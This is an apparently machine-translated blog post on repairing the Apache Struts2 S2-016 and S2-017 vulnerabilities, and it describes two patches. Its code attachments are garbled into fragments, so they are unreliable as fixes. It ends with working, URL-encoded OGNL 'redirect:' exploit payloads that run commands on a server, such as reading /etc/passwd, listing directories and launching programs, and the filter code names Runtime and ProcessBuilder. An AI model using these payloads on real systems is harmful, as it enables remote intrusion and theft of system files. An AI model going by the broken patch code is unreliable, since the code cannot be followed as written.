Struts2 latest vulnerability S2-016, S2-017 repair solution

Yesterday, struts2 broke a major vulnerability. In the words of brother Tao, "this afternoon, hackers in China started to exploit this vulnerability like crazy. You can feel it ."

Check the data of wooyun over the past two days:

Related reports:

Disaster Day: the Chinese Internet has suffered a high-risk Struts2 Vulnerability

Struts2 has been exposed to critical vulnerabilities, affecting all versions

Official description:

S2-016: https://cwiki.apache.org/confluence/display/WW/S2-016
S2-017: https://cwiki.apache.org/confluence/display/WW/S2-017

 

====================================

Struts2 vulnerability S2-016, S2-017 repair solution:

Put the code at the end to make the layout neat.

Solution 1:
Solution introduction:
Manually modify the source code of Ognl. jar to add malicious code filtering. This method can only fix S2-016 vulnerabilities, but may prevent future ognl vulnerabilities.
Procedure:
1.1 find the ognl-version.jar in the project and find its source code. Decompress the source code and import it to eclipse. Find Ongl. java and modify the following code:
1.2 export the modified project through eclipse as a ognl-my.jar and put it in the lib directory.
1.3 Delete original ognl-version.jar
1.4 restart the server.

Solution 2:
Solution introduction:
Override the handleSpecialParameters method of struts2 DefaultActionMapper to filter parameters such as action, redirect, and redirectAction. This method fixes S2-016 and S2-017 vulnerabilities.
Procedure:
2.1 create com/website/struts2/mydefaactionactionmapper. java. The Code is as follows:
2.2 copy mydefaactionactionmapper. class to the/com/website/struts2/directory.
2.3 Add the following code with struts. xml:
2.4 restart the server.

Note:
1. In solution 1, "malicious code" and "action, redirect, and redirectAction" in solution 2 are both hardcode. If necessary, you can read them from the configuration file.
2. solution 1 has no impact on the system in principle. solution 2 has conducted redirect and redirectAction jump tests, but has not conducted full-site tests.
3. Both solution 1 and solution 2 can be executed at the same time, or only one of them can be executed.

 

Attachment:

Ognl. java

String evalMethod [] = {"Runtime", "ProcessBuilder" = (I = 0; I <evalMethod. length; I ++ (methodString. indexOf (evalMethod [I]. toLowerCase ()>-1 "| OGNL is executing a malicious statement |" + methodString + "| contact the security engineer to view the message !!! "= OgnlParser (

 

Mydefaactionactionmapper. java

  MyDefaultActionMapper  = = (Iterator iterator == ((key.endsWith(".x")) || (key.endsWith(".y"= key.substring(0, key.length() - 2             ((key.contains("redirect:")) || (key.contains("redirectAction:")) || (key.contains("action:"                         (!= (ParameterAction)  (parameterAction != 

 

Struts. xml

 

Add several test codes (this code is from the Internet and will not be liable for the consequences of using this code ):

1. View users? Redirect: $ {% 23a % 3d (new % 20java. lang. processBuilder (new % 20java. lang. string [] {'cat', '/etc/passwd '})). start (), % 23b % 3d % 23a. getInputStream (), % 23c % 3 dnew % 20java. io. inputStreamReader (% 23b), % 23d % 3 dnew % 20java. io. bufferedReader (% 23c), % 23e % 3 dnew % 20 char [50000], % 23d. read (% 23e), % 23 matt % 3d % 23context. get ('com. opensymphony. xwork2.dispatcher. httpServletResponse '), % 23matt. getWriter (). println (% 23e), % 23matt. getWriter (). f Lush (), % 23matt. getWriter (). close ()} 2. view the path? Redirect: $ {% 23a % 3d (new % 20java. lang. processBuilder (new % 20java. lang. string [] % 20 {'Ls', '-l '})). start (), % 23b % 3d % 23a. getInputStream (), % 23c % 3 dnew % 20java. io. inputStreamReader % 20 (% 23b), % 23d % 3 dnew % 20java. io. bufferedReader (% 23c), % 23e % 3 dnew % 20 char [50000], % 23d. read (% 23e), % 23 matt % 3d % 20% 23context. get ('com. opensymphony. xwork2.dispatcher. httpServletResponse '), % 23matt. getWriter (). println % 20 (% 23e), % 23matt. getWriter (). Flush (), % 23matt. getWriter (). close ()} 3. view the specified path? Redirect: $ % 7B % 23a % 3d (new % 20java. lang. processBuilder (new % 20java. lang. string % 5B % 5D % 20% 7B 'Ls', '-l','/webapp/proc/portal/'% 7D )). start (), % 23b % 3d % 23a. getInputStream (), % 23c % 3 dnew % 20java. io. inputStreamReader % 20 (% 23b), % 23d % 3 dnew % 20java. io. bufferedReader (% 23c), % 23e % 3 dnew % 20 char % 5B50000% 5D, % 23d. read (% 23e), % 23 matt % 3d % 20% 23context. get ('com. opensymphony. xwork2.dispatcher. httpServletResponse '), % 23matt. getWriter (). Println % 20 (% 23e), % 23matt. getWriter (). flush (), % 23matt. getWriter (). close () % 7D4. Project path? Redirect % 3A % 24% 7B % 23req % 3D % 23context. get% 28% 27com. opensymphony. xwork2.dispatcher. httpServletRequest % 27% 29% 2C % 23a % 3D % 23req. getSession % 28% 29% 2C % 23b % 3D % 23a. getServletContext % 28% 29% 2C % 23c % 3D % 23b. getRealPath % 28% 22% 2F % 22% 29% 2C % 23 matt % 3D % 23context. get% 28% 27com. opensymphony. xwork2.dispatcher. httpServletResponse % 27% 29% 2C % 23matt. getWriter % 28% 29. println % 28% 23c % 29% 2C % 23matt. getWriter % 28% 29. flush % 28% 29% 2C % 23matt. getWriter % 28% 29. close % 28% 29% 7D

Windows:

2. Arbitrary Code Execution? RedirectAction: 255.252.16(newjavasjava.lang.processbuilder(newjavasjava.lang.string?#'notepad.exe ', 'goes', 'where'}). start ()}

The code for this article has Reference URL: http://www.inbreak.net/archives/507